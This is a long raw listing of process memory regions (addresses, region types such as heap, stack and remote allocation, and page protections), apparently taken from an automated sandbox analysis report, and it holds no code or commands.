heap
page read and write
291A82A5000
trusted library allocation
page read and write
23B284AC000
heap
page read and write
284F0000
trusted library allocation
page read and write
23B2826A000
heap
page read and write
291B6E0A000
trusted library allocation
page read and write
23B2814B000
heap
page read and write
2518F000
stack
page read and write
27C70000
trusted library allocation
page read and write
23B28355000
heap
page read and write
23B28210000
heap
page read and write
291BEF50000
heap
page read and write
23B282A3000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B282B3000
heap
page read and write
23B28345000
heap
page read and write
257B6000
trusted library allocation
page read and write
23B283AD000
heap
page read and write
23B2852E000
heap
page read and write
AD7D74D000
stack
page read and write
AD7DCFE000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
23B2856F000
heap
page read and write
24FCE000
stack
page read and write
27C3E000
stack
page read and write
A796000
direct allocation
page execute and read and write
291A4C64000
heap
page read and write
23B281BD000
heap
page read and write
23B28488000
heap
page read and write
23B2854B000
heap
page read and write
23B28314000
heap
page read and write
291A6780000
heap
page read and write
25440000
trusted library allocation
page read and write
23B2827C000
heap
page read and write
23B2815F000
heap
page read and write
9C00000
direct allocation
page read and write
252BE000
stack
page read and write
23B2856F000
heap
page read and write
23B284C3000
heap
page read and write
7F300000
trusted library allocation
page execute and read and write
4C2B000
trusted library allocation
page read and write
8690000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
2792000
trusted library allocation
page read and write
79AD000
stack
page read and write
291BEFB2000
heap
page read and write
23B262F6000
heap
page read and write
7890000
trusted library allocation
page read and write
7A70000
trusted library allocation
page read and write
9746000
remote allocation
page execute and read and write
23B28563000
heap
page read and write
27C70000
trusted library allocation
page read and write
23B28243000
heap
page read and write
291A4C69000
heap
page read and write
23B28170000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
23B261F0000
heap
page read and write
23B2837E000
heap
page read and write
23B28292000
heap
page read and write
770A000
heap
page read and write
1C673810000
heap
page read and write
27C70000
trusted library allocation
page read and write
31CF000
unkown
page read and write
27C80000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
284E0000
trusted library allocation
page read and write
23B28362000
heap
page read and write
23B2856F000
heap
page read and write
291B6B20000
trusted library allocation
page read and write
23B26275000
heap
page read and write
1C6735A0000
heap
page read and write
49F0000
trusted library allocation
page read and write
23B28367000
heap
page read and write
722A000
stack
page read and write
2EAF000
heap
page read and write
27C70000
trusted library allocation
page read and write
23B2836F000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7630000
heap
page read and write
291A6B11000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
28370000
trusted library allocation
page read and write
27C67000
trusted library allocation
page read and write
23B2637D000
heap
page read and write
277CF000
heap
page read and write
9A50000
heap
page read and write
23B285D1000
heap
page read and write
23B2834E000
heap
page read and write
23B28692000
heap
page read and write
2865E000
stack
page read and write
3D46000
remote allocation
page execute and read and write
7FFD9B9F0000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
291A6D37000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
27C9E000
trusted library allocation
page read and write
49A0000
trusted library allocation
page read and write
23B28113000
heap
page read and write
291A6AD0000
heap
page execute and read and write
2AED000
stack
page read and write
27C70000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
23B28239000
heap
page read and write
6F46000
remote allocation
page execute and read and write
7FFD9B762000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
27CB0000
trusted library allocation
page read and write
4A90000
heap
page read and write
9D96000
direct allocation
page execute and read and write
850D000
stack
page read and write
23B2856F000
heap
page read and write
23B281BD000
heap
page read and write
23B282BF000
heap
page read and write
28370000
trusted library allocation
page read and write
277F7000
heap
page read and write
708D000
stack
page read and write
3030000
heap
page read and write
27C60000
trusted library allocation
page read and write
2EA0000
heap
page read and write
2835E000
stack
page read and write
23B28222000
heap
page read and write
25476000
trusted library allocation
page read and write
3010000
heap
page read and write
6F4E000
stack
page read and write
23B2839A000
heap
page read and write
23B28482000
heap
page read and write
71EE000
stack
page read and write
7A40000
trusted library allocation
page read and write
7130000
direct allocation
page read and write
23B285D0000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B282A4000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
5C39000
trusted library allocation
page read and write
23B28136000
heap
page read and write
9CB0000
heap
page read and write
23B263AC000
heap
page read and write
23B2826C000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
2546E000
trusted library allocation
page read and write
27C53000
trusted library allocation
page read and write
98F5000
heap
page read and write
23B28340000
heap
page read and write
25781000
trusted library allocation
page read and write
27CB0000
trusted library allocation
page execute and read and write
9C80000
direct allocation
page read and write
257F7000
trusted library allocation
page read and write
8B30000
direct allocation
page read and write
27C70000
trusted library allocation
page read and write
49D2000
trusted library allocation
page read and write
6F8E000
stack
page read and write
25580000
heap
page read and write
291BF00F000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B262EB000
heap
page read and write
23B282C1000
heap
page read and write
49A4000
trusted library allocation
page read and write
27C50000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
23B28311000
heap
page read and write
28520000
trusted library allocation
page read and write
291A6946000
heap
page read and write
CF96000
direct allocation
page execute and read and write
23B28697000
heap
page read and write
5146000
remote allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
24F0E000
stack
page read and write
23B2814A000
heap
page read and write
4FA8D5A000
stack
page read and write
28500000
trusted library allocation
page read and write
23B26220000
heap
page read and write
27C80000
trusted library allocation
page read and write
27ABE000
stack
page read and write
4AAB000
trusted library allocation
page read and write
277D7000
heap
page read and write
277D5000
heap
page read and write
7150000
direct allocation
page read and write
284F0000
trusted library allocation
page read and write
792E000
stack
page read and write
27807000
heap
page read and write
4BD1000
trusted library allocation
page read and write
27C50000
trusted library allocation
page read and write
26781000
trusted library allocation
page read and write
2504B000
stack
page read and write
AD7E03F000
stack
page read and write
23B28113000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
23B2812B000
heap
page read and write
9B60000
direct allocation
page read and write
7830000
trusted library allocation
page read and write
277D000
trusted library allocation
page execute and read and write
2546A000
trusted library allocation
page read and write
2EB0000
heap
page read and write
284F0000
trusted library allocation
page read and write
7090000
heap
page execute and read and write
23B282B8000
heap
page read and write
2869F000
stack
page read and write
85E0000
trusted library allocation
page read and write
71A0000
direct allocation
page read and write
23B28582000
heap
page read and write
23B283AD000
heap
page read and write
291BF016000
heap
page read and write
4AA8000
trusted library allocation
page read and write
291A879A000
trusted library allocation
page read and write
291A731C000
trusted library allocation
page read and write
23B281B0000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
23B28295000
heap
page read and write
23B28710000
heap
page read and write
284F0000
trusted library allocation
page read and write
23B2854F000
heap
page read and write
5B46000
remote allocation
page execute and read and write
28360000
trusted library allocation
page read and write
6FCF000
stack
page read and write
7600000
heap
page execute and read and write
4980000
trusted library section
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
7877000
trusted library allocation
page read and write
253B0000
heap
page read and write
23B2856F000
heap
page read and write
23B262FF000
heap
page read and write
23B28178000
heap
page read and write
27C70000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
291A4FF5000
heap
page read and write
27C60000
trusted library allocation
page read and write
291A6994000
heap
page read and write
49C0000
trusted library allocation
page read and write
4FA9AFB000
stack
page read and write
27C50000
trusted library allocation
page read and write
27C72000
trusted library allocation
page read and write
2EC0000
heap
page read and write
27C60000
trusted library allocation
page read and write
28370000
trusted library allocation
page read and write
72CD000
stack
page read and write
27C50000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
27CA0000
trusted library allocation
page read and write
9C30000
direct allocation
page read and write
27C70000
trusted library allocation
page read and write
23B28275000
heap
page read and write
27C60000
trusted library allocation
page read and write
27CC0000
trusted library allocation
page read and write
8645000
trusted library allocation
page read and write
23B28184000
heap
page read and write
3C60000
remote allocation
page execute and read and write
23B2813E000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
8B40000
direct allocation
page read and write
291BEF65000
heap
page read and write
23B26389000
heap
page read and write
291A4CAD000
heap
page read and write
78EE000
stack
page read and write
25490000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
27CF0000
trusted library allocation
page read and write
23B283AD000
heap
page read and write
284F0000
trusted library allocation
page read and write
27CB0000
trusted library allocation
page read and write
23B285D1000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
27CB0000
trusted library allocation
page read and write
23B282A8000
heap
page read and write
27C60000
trusted library allocation
page read and write
27A3D000
stack
page read and write
AD7EC0E000
stack
page read and write
25278000
stack
page read and write
23B283AD000
heap
page read and write
9AD5000
heap
page read and write
291A8990000
trusted library allocation
page read and write
23B28111000
heap
page read and write
291BF006000
heap
page read and write
23B28556000
heap
page read and write
23B28620000
heap
page read and write
291A6610000
heap
page read and write
AD7D6C3000
stack
page read and write
23B2827C000
heap
page read and write
23B285A6000
heap
page read and write
23B28168000
heap
page read and write
27C70000
trusted library allocation
page read and write
25550000
heap
page read and write
23B28173000
heap
page read and write
9C40000
direct allocation
page read and write
2BED000
stack
page read and write
27C50000
trusted library allocation
page read and write
27CE0000
trusted library allocation
page read and write
23B2853D000
heap
page read and write
23B287BE000
heap
page read and write
2514E000
stack
page read and write
23B2639D000
heap
page read and write
25770000
heap
page execute and read and write
2797000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
734A000
stack
page read and write
23B28836000
heap
page read and write
9B08000
heap
page read and write
23B28492000
heap
page read and write
27C70000
trusted library allocation
page read and write
AD7EC8D000
stack
page read and write
27C61000
trusted library allocation
page read and write
23B2836A000
heap
page read and write
23B28492000
heap
page read and write
2750000
trusted library allocation
page read and write
23B28348000
heap
page read and write
7722000
heap
page read and write
7FA50000
trusted library allocation
page execute and read and write
23B28391000
heap
page read and write
8467000
stack
page read and write
291A6F81000
trusted library allocation
page read and write
8D46000
remote allocation
page execute and read and write
23B282BD000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B28564000
heap
page read and write
25560000
remote allocation
page read and write
23B28213000
heap
page read and write
2831E000
stack
page read and write
23B282B1000
heap
page read and write
28370000
trusted library allocation
page read and write
291A6AD7000
heap
page execute and read and write
27C80000
trusted library allocation
page read and write
291A4C73000
heap
page read and write
9B4D000
heap
page read and write
98B0000
heap
page read and write
291A6680000
trusted library allocation
page read and write
23B2835B000
heap
page read and write
23B28482000
heap
page read and write
23B2826A000
heap
page read and write
27C50000
trusted library allocation
page read and write
4AFC000
stack
page read and write
2543E000
stack
page read and write
254F0000
heap
page read and write
23B282A8000
heap
page read and write
291A6FDC000
trusted library allocation
page read and write
9C50000
direct allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
27C80000
trusted library allocation
page read and write
8B80000
direct allocation
page read and write
27C70000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
9A58000
heap
page read and write
27C50000
trusted library allocation
page read and write
25070000
trusted library allocation
page read and write
291A4DF0000
heap
page read and write
7880000
trusted library allocation
page read and write
23B28498000
heap
page read and write
23B2826C000
heap
page read and write
291A4C20000
heap
page read and write
27C80000
trusted library allocation
page read and write
23B28319000
heap
page read and write
291A4C4B000
heap
page read and write
704F000
stack
page read and write
27C60000
trusted library allocation
page read and write
291BEE70000
heap
page read and write
27C60000
trusted library allocation
page read and write
7687000
heap
page read and write
27C60000
trusted library allocation
page read and write
291A6660000
trusted library allocation
page read and write
49D5000
trusted library allocation
page execute and read and write
758E000
stack
page read and write
28500000
trusted library allocation
page read and write
789A000
trusted library allocation
page read and write
27CA0000
trusted library allocation
page read and write
23B28147000
heap
page read and write
28370000
trusted library allocation
page read and write
291BEF8B000
heap
page read and write
27C70000
trusted library allocation
page read and write
291A72F1000
trusted library allocation
page read and write
76FB000
heap
page read and write
23B26380000
heap
page read and write
2F00000
heap
page read and write
23B285D0000
heap
page read and write
7350000
heap
page read and write
291B6B31000
trusted library allocation
page read and write
23B262C0000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B28117000
heap
page read and write
24F8D000
stack
page read and write
23B284AC000
heap
page read and write
23B282A3000
heap
page read and write
23B283A9000
heap
page read and write
2500D000
stack
page read and write
23B2854F000
heap
page read and write
4FA94FE000
stack
page read and write
23B28298000
heap
page read and write
23B2835A000
heap
page read and write
2760000
trusted library allocation
page read and write
9A81000
heap
page read and write
23B28310000
heap
page read and write
291B6B11000
trusted library allocation
page read and write
23B28322000
heap
page read and write
23B28557000
heap
page read and write
291A6949000
heap
page read and write
23B282A8000
heap
page read and write
27C60000
trusted library allocation
page read and write
2F1B000
heap
page read and write
7ADB000
stack
page read and write
7A10000
trusted library allocation
page read and write
23B2854C000
heap
page read and write
291A7208000
trusted library allocation
page read and write
4D28000
trusted library allocation
page read and write
291A6F42000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
291A6A07000
heap
page read and write
23B283AD000
heap
page read and write
88B31FD000
stack
page read and write
AD7E13F000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2782000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
27C40000
trusted library allocation
page read and write
23B2818C000
heap
page read and write
2FCE000
stack
page read and write
25581000
heap
page read and write
27CC0000
trusted library allocation
page read and write
277EE000
heap
page read and write
87CD000
stack
page read and write
1C6735C0000
heap
page read and write
330F000
stack
page read and write
23B283AD000
heap
page read and write
884E000
stack
page read and write
9CB7000
heap
page read and write
23B28154000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
28540000
trusted library allocation
page execute and read and write
23B2826A000
heap
page read and write
23B283AD000
heap
page read and write
279B000
trusted library allocation
page execute and read and write
27C90000
trusted library allocation
page read and write
2547D000
trusted library allocation
page read and write
291BF020000
heap
page read and write
27C70000
trusted library allocation
page read and write
7716000
heap
page read and write
28370000
trusted library allocation
page read and write
314E000
stack
page read and write
27C60000
trusted library allocation
page read and write
8B70000
direct allocation
page read and write
291BF035000
heap
page read and write
23B287C0000
heap
page read and write
28520000
trusted library allocation
page read and write
23B2848C000
heap
page read and write
291A7D28000
trusted library allocation
page read and write
8905000
heap
page read and write
27C70000
trusted library allocation
page read and write
291A6992000
heap
page read and write
291A7328000
trusted library allocation
page read and write
4BC0000
heap
page read and write
2764000
trusted library allocation
page read and write
9A0E000
stack
page read and write
291A6A19000
heap
page read and write
7140000
direct allocation
page read and write
28367000
trusted library allocation
page read and write
2523A000
stack
page read and write
23B28695000
heap
page read and write
27C70000
trusted library allocation
page read and write
4960000
heap
page read and write
7A30000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
254A0000
trusted library allocation
page read and write
27B3E000
stack
page read and write
284F0000
trusted library allocation
page read and write
23B28482000
heap
page read and write
23B282B4000
heap
page read and write
23B28222000
heap
page read and write
4A80000
heap
page readonly
23B282A8000
heap
page read and write
23B281A5000
heap
page read and write
7FFD9B764000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
252FE000
stack
page read and write
23B284C3000
heap
page read and write
23B28386000
heap
page read and write
23B28199000
heap
page read and write
284F0000
trusted library allocation
page read and write
23B2814F000
heap
page read and write
49AD000
trusted library allocation
page execute and read and write
23B2869D000
heap
page read and write
23B283AD000
heap
page read and write
23B2839F000
heap
page read and write
25540000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
23B2827C000
heap
page read and write
27C80000
trusted library allocation
page read and write
7705000
heap
page read and write
888D000
stack
page read and write
278A000
trusted library allocation
page execute and read and write
85F0000
trusted library allocation
page read and write
291A6B00000
heap
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
4BBE000
stack
page read and write
2553C000
stack
page read and write
23B2638B000
heap
page read and write
23B28338000
heap
page read and write
8600000
heap
page read and write
98C0000
heap
page read and write
27C70000
trusted library allocation
page read and write
23B283AD000
heap
page read and write
291BEE73000
heap
page read and write
8908000
heap
page read and write
23B2637E000
heap
page read and write
8480000
trusted library allocation
page execute and read and write
2F6A000
heap
page read and write
27C80000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
291A6640000
trusted library allocation
page read and write
878B000
stack
page read and write
23B2831C000
heap
page read and write
257BF000
trusted library allocation
page read and write
23B284B6000
heap
page read and write
291A6785000
heap
page read and write
284E0000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
23B2832D000
heap
page read and write
AD7DA7E000
stack
page read and write
23B28330000
heap
page read and write
23B2838F000
heap
page read and write
23B282A3000
heap
page read and write
23B282B7000
heap
page read and write
27A7E000
stack
page read and write
9B12000
heap
page read and write
291A4CB3000
heap
page read and write
23B2848B000
heap
page read and write
27C50000
trusted library allocation
page read and write
284F0000
trusted library allocation
page read and write
23B2869B000
heap
page read and write
4A98000
heap
page read and write
7180000
direct allocation
page read and write
5BF9000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
23B28143000
heap
page read and write
88B34FF000
unkown
page read and write
27C80000
trusted library allocation
page read and write
88EA000
heap
page read and write
23B282A3000
heap
page read and write
253A0000
trusted library allocation
page read and write
23B284A9000
heap
page read and write
23B2835A000
heap
page read and write
23B28157000
heap
page read and write
23B28298000
heap
page read and write
23B281B8000
heap
page read and write
27C60000
trusted library allocation
page read and write
256C0000
heap
page execute and read and write
766E000
heap
page read and write
23B262F0000
heap
page read and write
23B27C70000
remote allocation
page read and write
2780000
trusted library allocation
page read and write
9A95000
heap
page read and write
8470000
heap
page read and write
23B282C3000
heap
page read and write
4990000
trusted library allocation
page read and write
23B28561000
heap
page read and write
23B28292000
heap
page read and write
284F0000
trusted library allocation
page read and write
868C000
stack
page read and write
284E0000
trusted library allocation
page read and write
27C63000
trusted library allocation
page read and write
2545E000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
2795000
trusted library allocation
page execute and read and write
27C70000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
AD7ED0B000
stack
page read and write
9A83000
heap
page read and write
5243000
trusted library allocation
page read and write
23B281B5000
heap
page read and write
23B28373000
heap
page read and write
7870000
trusted library allocation
page read and write
23B28711000
heap
page read and write
27C70000
trusted library allocation
page read and write
284F0000
trusted library allocation
page read and write
9B24000
heap
page read and write
2EA3000
heap
page read and write
3330000
trusted library section
page read and write
2E9E000
unkown
page read and write
4FA93FE000
stack
page read and write
23B2826C000
heap
page read and write
27CB0000
trusted library allocation
page read and write
2E37000
stack
page read and write
E396000
direct allocation
page execute and read and write
7360000
heap
page read and write
23B28357000
heap
page read and write
9B50000
direct allocation
page read and write
88AD000
heap
page read and write
291A7307000
trusted library allocation
page read and write
23B28563000
heap
page read and write
9C20000
direct allocation
page read and write
23B2817B000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B2827C000
heap
page read and write
23B28B31000
heap
page read and write
23B281AD000
heap
page read and write
23B28292000
heap
page read and write
27C71000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
88B9000
heap
page read and write
27C70000
trusted library allocation
page read and write
4FA91FE000
stack
page read and write
23B27CD0000
heap
page read and write
23B2833D000
heap
page read and write
23B28189000
heap
page read and write
291A4C85000
heap
page read and write
23B2814A000
heap
page read and write
27C70000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
23B281BD000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B283A9000
heap
page read and write
88C1000
heap
page read and write
27C60000
trusted library allocation
page read and write
8590000
trusted library allocation
page execute and read and write
7FFD9B763000
trusted library allocation
page execute and read and write
267E6000
trusted library allocation
page read and write
3039000
heap
page read and write
23B282A8000
heap
page read and write
277C8000
heap
page read and write
2BCC000
stack
page read and write
291A6670000
heap
page readonly
23B28292000
heap
page read and write
27C50000
trusted library allocation
page read and write
291A4FF0000
heap
page read and write
25550000
trusted library allocation
page read and write
49B0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
700E000
stack
page read and write
25560000
remote allocation
page read and write
334A000
heap
page read and write
28510000
trusted library allocation
page read and write
23B281BD000
heap
page read and write
2790000
trusted library allocation
page read and write
712B000
stack
page read and write
27C80000
trusted library allocation
page read and write
23B28532000
heap
page read and write
23B2827C000
heap
page read and write
2786000
trusted library allocation
page execute and read and write
25308000
trusted library allocation
page read and write
890B000
heap
page read and write
27C70000
trusted library allocation
page read and write
49A3000
trusted library allocation
page execute and read and write
27C80000
trusted library allocation
page read and write
23B28311000
heap
page read and write
23B2835A000
heap
page read and write
27CC0000
trusted library allocation
page read and write
23B282C1000
heap
page read and write
AD7DC7E000
stack
page read and write
23B2819C000
heap
page read and write
23B28376000
heap
page read and write
AD7D78F000
stack
page read and write
27CB0000
trusted library allocation
page read and write
23B282A8000
heap
page read and write
291A69F1000
heap
page read and write
27C40000
trusted library allocation
page read and write
23B28497000
heap
page read and write
AD7DB7C000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
23B26270000
heap
page read and write
6546000
remote allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
27C80000
trusted library allocation
page read and write
23B2638B000
heap
page read and write
2F48000
heap
page read and write
98F7000
heap
page read and write
291A88AD000
trusted library allocation
page read and write
9396000
direct allocation
page execute and read and write
27C70000
trusted library allocation
page read and write
284F0000
trusted library allocation
page read and write
23B28482000
heap
page read and write
7FFD9B77B000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8550000
heap
page read and write
267A9000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
23B26371000
heap
page read and write
254B0000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
291A72B7000
trusted library allocation
page read and write
7FFD9B816000
trusted library allocation
page read and write
23B282A8000
heap
page read and write
4B50000
trusted library allocation
page read and write
27AFE000
stack
page read and write
291BF2F0000
heap
page read and write
23B262F1000
heap
page read and write
730E000
stack
page read and write
AD7ED8B000
stack
page read and write
23B2812E000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
300E000
stack
page read and write
291A4C2D000
heap
page read and write
284F0000
trusted library allocation
page read and write
9A4F000
stack
page read and write
27C90000
trusted library allocation
page read and write
9AB1000
heap
page read and write
251F0000
direct allocation
page read and write
291A6930000
heap
page read and write
8890000
heap
page read and write
B196000
direct allocation
page execute and read and write
291A4C10000
heap
page read and write
276D000
trusted library allocation
page execute and read and write
3340000
heap
page read and write
23B282A8000
heap
page read and write
291A4CAF000
heap
page read and write
7095000
heap
page execute and read and write
27807000
heap
page read and write
28370000
trusted library allocation
page read and write
23B28697000
heap
page read and write
88B35FF000
stack
page read and write
2E50000
heap
page read and write
27CD0000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
728D000
stack
page read and write
8560000
trusted library allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
9C70000
direct allocation
page read and write
27C90000
trusted library allocation
page read and write
7170000
direct allocation
page read and write
291A66B2000
trusted library allocation
page read and write
23B28319000
heap
page read and write
291A4E10000
heap
page read and write
291A6940000
heap
page read and write
291A879F000
trusted library allocation
page read and write
27C50000
trusted library allocation
page read and write
8570000
trusted library allocation
page read and write
27CB0000
trusted library allocation
page read and write
23B2835B000
heap
page read and write
27CA0000
trusted library allocation
page read and write
291B6DFC000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
23B2638B000
heap
page read and write
4B3E000
stack
page read and write
8B60000
direct allocation
page read and write
23B28396000
heap
page read and write
23B283AD000
heap
page read and write
27C60000
trusted library allocation
page read and write
2F6C000
heap
page read and write
23B28298000
heap
page read and write
23B2829B000
heap
page read and write
ED96000
direct allocation
page execute and read and write
23B281A8000
heap
page read and write
1C6734C0000
heap
page read and write
764D000
heap
page read and write
84A0000
trusted library allocation
page read and write
23B262F1000
heap
page read and write
5BD1000
trusted library allocation
page read and write
25570000
heap
page read and write
23B28513000
heap
page read and write
23B285F4000
heap
page read and write
AD7DBFE000
stack
page read and write
27C70000
trusted library allocation
page read and write
2E70000
heap
page read and write
23B262F7000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
23B283AD000
heap
page read and write
291A72E0000
trusted library allocation
page read and write
291A6A60000
heap
page execute and read and write
23B2816B000
heap
page read and write
9AD8000
heap
page read and write
5D5F000
trusted library allocation
page read and write
76F6000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
23B28194000
heap
page read and write
23B28324000
heap
page read and write
277C0000
heap
page read and write
23B28333000
heap
page read and write
2763000
trusted library allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
27CA0000
trusted library allocation
page read and write
7160000
direct allocation
page read and write
1C673815000
heap
page read and write
291A66F0000
trusted library allocation
page read and write
AD7EB8E000
stack
page read and write
27C90000
trusted library allocation
page read and write
23B28110000
heap
page read and write
291BEFC1000
heap
page read and write
4FA99FF000
stack
page read and write
86A0000
trusted library allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
284F0000
trusted library allocation
page read and write
8B50000
direct allocation
page read and write
291A7275000
trusted library allocation
page read and write
23B28697000
heap
page read and write
92B0000
direct allocation
page execute and read and write
8346000
remote allocation
page execute and read and write
7946000
remote allocation
page execute and read and write
27CD0000
trusted library allocation
page execute and read and write
9B3A000
heap
page read and write
27C97000
trusted library allocation
page read and write
27C61000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
284F0000
trusted library allocation
page read and write
AD7DAFE000
stack
page read and write
27839000
heap
page read and write
23B263A0000
heap
page read and write
25560000
remote allocation
page read and write
23B284AC000
heap
page read and write
There are 959 hidden memdumps, click here to show them.